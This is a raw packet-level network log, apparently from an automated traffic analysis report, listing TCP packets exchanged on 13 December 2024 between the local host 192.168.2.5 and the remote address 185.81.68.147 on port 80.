                                                                                                                                                                Dec 13, 2024 01:37:36.109119892 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109133959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109157085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109178066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109194040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109215021 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109230042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109252930 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109272957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109289885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109314919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109330893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109358072 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109375954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109400034 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109416962 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109445095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109476089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109504938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109520912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109541893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109560966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109579086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109605074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109618902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109643936 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109658003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109682083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109700918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109716892 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109786034 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109816074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109842062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109873056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109899998 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109970093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.109988928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110013962 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110033035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110058069 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110071898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110094070 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110114098 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110138893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110157967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110177040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110191107 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110215902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110239029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110254049 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110276937 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110299110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110320091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110340118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110356092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110378027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110392094 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110414982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110429049 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110455990 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110474110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110505104 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110518932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110543966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110559940 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110584021 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110596895 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110622883 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110647917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110661983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110682011 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110694885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110717058 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110744953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110765934 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110783100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110804081 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110817909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110845089 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110902071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110918045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110939026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110953093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110980034 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.110994101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111015081 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111030102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111053944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111078024 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111095905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111115932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111136913 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111145973 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111175060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111190081 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111212969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111228943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111253977 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111274958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111293077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111320972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111337900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111352921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111373901 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111398935 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111413002 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111429930 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111444950 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111470938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111504078 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111520052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111541986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111555099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111584902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111599922 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111618996 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111669064 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111669064 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111685991 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111706972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111721039 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111751080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111763954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111793995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111814022 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111835003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111848116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111871958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111895084 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111910105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111938953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111953020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111977100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.111996889 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112020016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112082958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112109900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112135887 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112162113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112194061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112273932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112287998 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112313032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112341881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112358093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112385035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112400055 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112421036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112447023 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112472057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112485886 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112504959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112519979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112548113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112565041 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112596989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112617016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112617016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112644911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112659931 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112684011 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112698078 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112716913 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112737894 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112756014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112780094 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112796068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112816095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112842083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112857103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112886906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112900972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112921953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112952948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112972975 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.112987995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113010883 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113027096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113051891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113065958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113092899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113109112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113128901 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113145113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113172054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113226891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113244057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113266945 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113291979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113307953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113328934 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113343954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113363028 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113385916 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113399029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113420963 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113435984 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113456011 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113475084 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113500118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113513947 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113535881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113549948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113583088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113598108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113620043 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113634109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113656044 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113679886 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113694906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113715887 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113729954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113749027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113770008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113794088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113810062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113831997 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113845110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113873005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113887072 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113908052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113922119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113945007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113969088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.113985062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114010096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114022970 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114043951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114073038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114188910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114303112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114329100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114367008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114396095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114412069 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114438057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114449024 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114459991 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.114478111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114506960 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114521980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114550114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114737988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114763975 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114787102 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.114794016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114818096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114840031 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.114846945 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114851952 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.114860058 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.114866972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114875078 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.114919901 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114931107 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114958048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.114981890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115008116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115035057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115051031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115073919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115087032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115118980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115134954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115163088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115180016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115250111 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.115257025 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115262985 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.115277052 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.115283966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115291119 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.115298986 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.115336895 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.115345001 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.115351915 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.115370989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115396976 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.115406036 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.115412951 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.115421057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115469933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115492105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115509033 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.115514040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115518093 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.115525961 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.115535021 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.115536928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115542889 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.115580082 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.115587950 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.115632057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115649939 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115668058 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115689039 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115715027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115745068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115895987 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.115945101 CET4977580192.168.2.5185.81.68.147
